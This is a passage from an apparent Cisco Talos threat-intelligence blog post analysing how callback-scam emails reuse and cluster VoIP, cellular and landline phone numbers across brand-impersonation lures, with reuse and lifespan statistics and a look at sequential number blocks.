unrelated&#xA0;lures - including varied subject lines and different attachment formats like HEIC and PDF - to impersonate multiple brands simultaneously.&#xA0;</li><li>Security researchers can expose the hidden infrastructure of organized&#xA0;scam&#xA0;call centers by shifting focus from ephemeral email addresses to phone numbers, using clustering techniques to connect disparate campaigns and strengthen overall defensive postures.</li></ul><hr><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/phone-number-scams.jpg" alt="Insights into the clustering and reuse of phone numbers in scam emails"><p>Telephone-oriented&#xA0;attack&#xA0;delivery (TOAD) continues to be a prevalent tactic in modern email threats. By shifting the communication channel from email to a real-time conversation, attackers manipulate victims into&#xA0;disclosing&#xA0;sensitive information or installing malicious software.&#xA0;</p><p>Cisco Talos has expanded its threat intelligence capabilities to include phone numbers as a critical IOC. Our analysis covers a wide spectrum of line types, including wireless (cellular), landline, and Voice over Internet Protocol (VoIP). While scammers leverage all three, VoIP numbers are particularly prevalent due to their ease of acquisition and the difficulty of tracing them back to their origin. In fact, six of the ten largest campaigns we detected between February 26 and March 31, 2026 relied on VoIP infrastructure.</p><p>To better understand how these numbers are weaponized, this blog first explains the technical structure of VoIP numbers and the role of service providers in this ecosystem. We then broaden&#xA0;the&#xA0;scope to analyze reuse patterns, lifespan, and campaign characteristics across all line types. By sharing these insights,&#xA0;Talos&#xA0;aims to strengthen our collective defensive posture against these evolving threats.</p><h2 id="the-structure-of-voip-phone-numbers">The structure of VoIP phone numbers&#xA0;</h2><p>Most VoIP numbers follow the E.164 international public telecommunication numbering plan. This format ensures that every number is globally unique and can be routed correctly across the Public Switched Telephone Network (PSTN).&#xA0;</p><p>An E.164 number is limited to 15 digits and consists of:&#xA0;</p><ol><li>International Prefix (+):&#xA0;Indicates&#xA0;the number is in international format&#xA0;</li><li>Country Code (CC): 1 to 3 digits (e.g., 1 for the US/Canada, 44 for the UK)&#xA0;</li><li>Area Code/National Destination Code (NDC): Often referred to as the area code&#xA0;</li><li>Subscriber Number (SN): The specific number assigned to the user or device&#xA0;</li></ol><p>The above components are shown in the example phone number below:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-01-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="937" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-01-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-01-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-01-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-01-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;1. The structure of an example VoIP phone number.</span></figcaption></figure><h2 id="the-voip-ecosystem">The VoIP ecosystem&#xA0;</h2><p>Voice over Internet Protocol (VoIP) has become the primary medium for&#xA0;scam&#xA0;campaigns&#xA0;due to its cost&#xA0;effectiveness, ease of deployment, and API-driven automation. Within this ecosystem,&#xA0;we&#xA0;identify&#xA0;two primary operational models: wholesalers and retailers. VoIP wholesalers (e.g., Virtue, Twilio, and Bandwidth)&#xA0;operate&#xA0;in a&#xA0;business-to-business (B2B) capacity, sitting between Tier&#xA0;1 carriers (e.g., AT&amp;T, Verizon) and smaller service providers, selling high volumes of numbers in bulk. Conversely, VoIP retailers (e.g., RingCentral) sell finished business calling and collaboration solutions directly to organizations and end&#xA0;users.&#xA0;</p><p>VoIP providers are further categorized into&#xA0;communications&#xA0;platform&#xA0;as&#xA0;a&#xA0;service (CPaaS) and unified communications as a service (UCaaS).&#xA0;CPaaS&#xA0;providers offer programmable APIs that allow developers to integrate voice and messaging directly into applications. Because these platforms are designed for automation and high-volume traffic, they are&#xA0;frequently&#xA0;exploited by threat actors for rapid, API-driven number provisioning.&#xA0;In contrast,&#xA0;UCaaS&#xA0;providers offer comprehensive, end-user-facing communication suites.&#xA0;UCaaS&#xA0;platforms are typically designed for legitimate enterprise collaboration, and that makes them less attractive for&#xA0;scam email campaigns.&#xA0;Talos has found Sinch&#xA0;(primarily a leader in&#xA0;CPaaS)&#xA0;as the&#xA0;most commonly&#xA0;abused&#xA0;VoIP provider, and&#xA0;Verizon and NUSO as the least abused providers in the studied time window.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-03-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="975" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-03-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-03-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-03-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-03-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;2. The distribution of phone line types in&#xA0;scam&#xA0;emails.</span></figcaption></figure><p>While VoIP line types dominate the&#xA0;scam&#xA0;landscape&#xA0;(see Figure&#xA0;2), Talos has observed that threat actors utilize wireless (cellular) and landline numbers as well. Cellular numbers are harder to provision at scale, as they typically require physical SIM cards and stricter customer verification, making them more expensive and less disposable than VoIP numbers.&#xA0;Nevertheless, they are still widely adopted by scammers.&#xA0;Figure&#xA0;3&#xA0;shows the distribution&#xA0;of wireless carriers that&#xA0;are used byscammers in the studied time window.&#xA0;Landline numbers, on the other hand,&#xA0;are used to project a sense of local presence or established business legitimacy. By using a landline with a specific local area code, scammers can effectively impersonate local businesses (e.g., banks, utility companies, or government offices).</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-02-2.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="1227" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-02-2.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-02-2.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-02-2.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-02-2.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;3. The distribution of&#xA0;carrier names in wireless phone numbers&#xA0;found&#xA0;in&#xA0;scam&#xA0;emails.</span></figcaption></figure><h2 id="phone-number-reuse-and-lifespan-in-scam-campaigns">Phone number&#xA0;reuse and lifespan in&#xA0;scam&#xA0;campaigns&#xA0;</h2><p>In this section, we provide insights into the lifecycle of phone numbers used in&#xA0;scam&#xA0;emails, examining how often they are reused, their typical lifespan, and how they appear across&#xA0;seemingly unrelated&#xA0;lures. Our analysis focuses on&#xA0;scam&#xA0;campaigns impersonating popular brands, including PayPal, Geek Squad (Best Buy), McAfee, and Norton LifeLock.&#xA0;</p><h3 id="phone-number-reuse-patterns">Phone&#xA0;number&#xA0;reuse&#xA0;patterns&#xA0;</h3><p>Talos&#xA0;identified&#xA0;1,652 unique phone numbers across these campaigns during the studied time window (February 26 to March 31). Of these, 57&#xA0;numbers (approximately 3.4%) were reused across multiple consecutive days. The longest period of reuse&#xA0;observed&#xA0;for a single phone number was four consecutive days.&#xA0;</p><p>As discussed in&#xA0;a&#xA0;<a href="https://blog.talosintelligence.com/pdfs-portable-documents-or-perfect-deliveries-for-phish/" rel="noreferrer noopener"><u>previous</u>&#xA0;<u>blog post</u></a>, phone numbers are reused for several strategic reasons. First, intelligence regarding phone numbers is often distributed more slowly than that of URLs or file hashes; many numbers remain under the radar of third-party reputation services for several days. Second, reuse offers logistical advantages for scam call centers, allowing them to maintain a consistent brand presence for multi-stage social engineering, callback scheduling, and persistent victim engagement. Finally, reuse minimizes operational costs, particularly for paid VoIP services. While we observed some phone numbers reused for up to four consecutive days, the most common reuse period was two consecutive days.</p><h3 id="lifespan-analysis-and-cool-down-periods">Lifespan analysis and cool-down periods&#xA0;</h3><p>Scammers do not always reuse phone numbers on consecutive days. Often, they implement a cool-down period&#xA0;&#x2014;&#xA0;pausing the use of a number for a few days to evade detection&#xA0;&#x2014;&#xA0;before reintroducing it into a campaign.&#xA0;</p><p>Our investigation into the lifespan of these numbers revealed that 108 phone numbers (~6.5%) remained active for more than one day. As shown in Figure 4, most phone numbers have a lifespan of two to six days, though a handful remained active for nearly a month. During the study window, the median lifespan was approximately 14 days. Notably, infrastructure longevity often correlates with the impersonated brand; as illustrated in Figure 5, PayPal-themed scam campaigns utilized significantly more persistent phone numbers than those impersonating Norton LifeLock.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-04-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="1253" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-04-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-04-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-04-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-04-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;4. The&#xA0;distribution of&#xA0;phone number&#xA0;lifespans&#xA0;(in days)&#xA0;in&#xA0;scam emails&#xA0;impersonating&#xA0;the above four&#xA0;brands.</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Phone-number-reuse-05-1.jpg" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="2000" height="1168" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Phone-number-reuse-05-1.jpg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Phone-number-reuse-05-1.jpg 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Phone-number-reuse-05-1.jpg 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Phone-number-reuse-05-1.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;5. The lifespan of phone numbers in&#xA0;scam&#xA0;emails for the top two impersonated brands.</span></figcaption></figure><h3 id="phone-numbers-across-unrelated-lures">Phone numbers across unrelated lures&#xA0;</h3><p>A&#xA0;scam&#xA0;or phishing&#xA0;lure is typically a combination of a business context, a psychological trigger, a call-to-action, and an impersonated brand (see Table 1 for&#xA0;a few&#xA0;examples). These lures appear across various email layers, including subject lines, body content, and attachments.</p>
<!--kg-card-begin: html-->
<table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="624" style="caret-color: rgb(0, 0, 0); color: rgb(0, 0, 0); font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-line: none; text-decoration-thickness: auto; text-decoration-style: solid; width: 6.5in; border-collapse: collapse;"><tbody><tr style="height: 35.25pt;"><td width="204" valign="top" style="width: 153pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Claimed business context<o:p></o:p></b></p></td><td width="119" valign="top" style="width: 89.25pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Psychological trigger<o:p></o:p></b></p></td><td width="151" valign="top" style="width: 113.25pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Call-to-action<o:p></o:p></b></p></td><td width="150" valign="top" style="width: 112.5pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Impersonated brand<o:p></o:p></b></p></td></tr><tr style="height: 15pt;"><td width="204" valign="top" style="width: 153pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Subscription renewal<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Invoice or billing statement<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Account security alert<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Order confirmation/shipping issue<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Technical support case<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Refund or overpayment notice<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Service cancelation confirmation<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Financial transaction verification<o:p></o:p></p></td><td width="119" valign="top" style="width: 89.25pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Urgency<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Fear/Loss aversion<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Confusion<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Relief opportunity<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Curiosity<o:p></o:p></p></td><td width="151" valign="top" style="width: 113.25pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Call a phone number<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Click a link<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Reply with personal details<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Download/open attachment<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Provide payment/banking information<o:p></o:p></p></td><td width="150" valign="top" style="width: 112.5pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">PayPal<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Geek Squad (Best Buy)<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">McAfee<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Norton LifeLock<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><o:p>&#xA0;</o:p></p></td></tr></tbody></table>
<!--kg-card-end: html-->
<p><em>Table 1. Examples of lures that most commonly appear in&#xA0;scam&#xA0;or phishing emails.</em></p><p>We&#xA0;observed&#xA0;phone numbers being recycled across diverse,&#xA0;seemingly unrelated&#xA0;lures:&#xA0;</p><ul><li><strong>Using the same phone number across multiple lures in the subject line:</strong> In one campaign, a single phone number appeared across multiple business contexts, such as &quot;order confirmation&quot; and &quot;financial transaction verification.&quot; Figure 6 demonstrates how these subject lines differ, despite the emails containing the same phone number and impersonating the same brand.</li></ul><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6a.png" width="1365" height="1929" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6a.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6a.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6a.png 1365w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6b.png" width="1361" height="1779" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6b.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6b.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6b.png 1361w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6c.png" width="1358" height="1672" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6c.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6c.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6c.png 1358w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6d.png" width="1360" height="1742" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6d.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6d.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6d.png 1360w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption><p><span style="white-space: pre-wrap;">Figure&#xA0;6.&#xA0;Four scam emails with completely different subject lines&#xA0;that&#xA0;contain the same phone number.</span></p></figcaption></figure><ul><li><strong>Using the same phone number across multiple</strong>&#xA0;<strong>document-based</strong>&#xA0;<strong>lures</strong>: In a second campaign, a single phone number was embedded in PDF attachments used for both&#xA0;&#x201C;subscription renewal&#x201D;&#xA0;and&#xA0;&#x201C;financial transaction verification.&#x201D;Interestingly, this campaign&#xA0;utilized&#xA0;two&#xA0;different brands&#xA0;&#x2014;&#xA0;PayPal and Norton LifeLock&#xA0;&#x2014;&#xA0;to redirect recipients to the same call center,&#xA0;leveraging&#xA0;urgency as a psychological trigger.</li></ul><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7a.png" width="1427" height="1927" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_7a.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_7a.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7a.png 1427w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7b.png" width="1112" height="1748" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_7b.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_7b.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7b.png 1112w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption><p><span style="white-space: pre-wrap;">Figure&#xA0;7. Two&#xA0;scam&#xA0;emails with different body contents that&#xA0;contain&#xA0;the same phone number&#xA0;while&#xA0;impersonating&#xA0;different brands.</span></p></figcaption></figure><ul><li><strong>Using the same phone number across multiple attachment file formats: </strong>In a third campaign, a single phone number was embedded in two different attachment formats: HEIC and JPEG. The use of HEIC (High Efficiency Image Container) &#x2014; a format often used for iPhone/iPad photos &#x2014; demonstrates the attackers&apos; efforts to bypass traditional file-based detection while maintaining high image quality. Talos has observed campaigns utilizing even more attachment types, confirming that threat actors frequently distribute a single phone number across multiple attack vectors to maximize their reach.</li></ul><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_8a.png" width="2000" height="1534" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_8a.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_8a.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Figure_8a.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Figure_8a.png 2400w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_8b.png" width="2000" height="1456" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_8b.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_8b.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Figure_8b.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Figure_8b.png 2400w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption><p><span style="white-space: pre-wrap;">Figure&#xA0;8. Two&#xA0;scam&#xA0;emails with different attachment file types that&#xA0;contain&#xA0;the same phone number&#xA0;while&#xA0;impersonating&#xA0;the same brand.</span></p></figcaption></figure><h2 id="phone-block-level-clustering">Phone block-level clustering&#xA0;</h2><p>In the context of&#xA0;scam&#xA0;emails and related smishing or callback&#xA0;scams, attackers&#xA0;utilize&#xA0;specific VoIP grouping and clustering techniques to bypass security filters, appear legitimate, and&#xA0;maintain&#xA0;high-volume operations. One of the most common tactics is sequential number grouping. Scammers often obtain large ranges of sequential phone numbers by&#xA0;purchasing&#xA0;Direct Inward Dialing (DID) blocks. Consequently, if a specific number is flagged as spam and blocked by a carrier, the attackers simply rotate to the next number in the block.&#xA0;</p><p>The figure below&#xA0;shows&#xA0;how a block of numbers&#xA0;&#x2014;&#xA0;differing only in the last four digits&#xA0;&#x2014;&#xA0;is used in various&#xA0;scam&#xA0;emails impersonating PayPal between March 3 and March 6, 2026. It is also&#xA0;clear&#xA0;that certain numbers are used in larger campaigns than others; for instance,&#xA0;&#x201C;+1&#xA0;804[-]713[-]4598&#x201D;&#xA0;was used in 117&#xA0;scam&#xA0;emails in a single day.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_9-2.png" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="1202" height="764" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_9-2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_9-2.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_9-2.png 1202w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;9. Example of sequential phone numbers used in&#xA0;scam&#xA0;emails impersonating one specific brand.</span></figcaption></figure><p>In large-scale&#xA0;scam&#xA0;campaigns, phone numbers within a single sequential block are reused across multiple brand lures. The figure below shows how a range of numbers in a sequential block is deployed across three different brand lures. As with the&#xA0;previous&#xA0;case, some phone numbers are&#xA0;utilized&#xA0;in significantly larger campaign volumes than others.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_10-2.png" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="1038" height="1184" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_10-2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_10-2.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_10-2.png 1038w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;10. Example of sequential phone 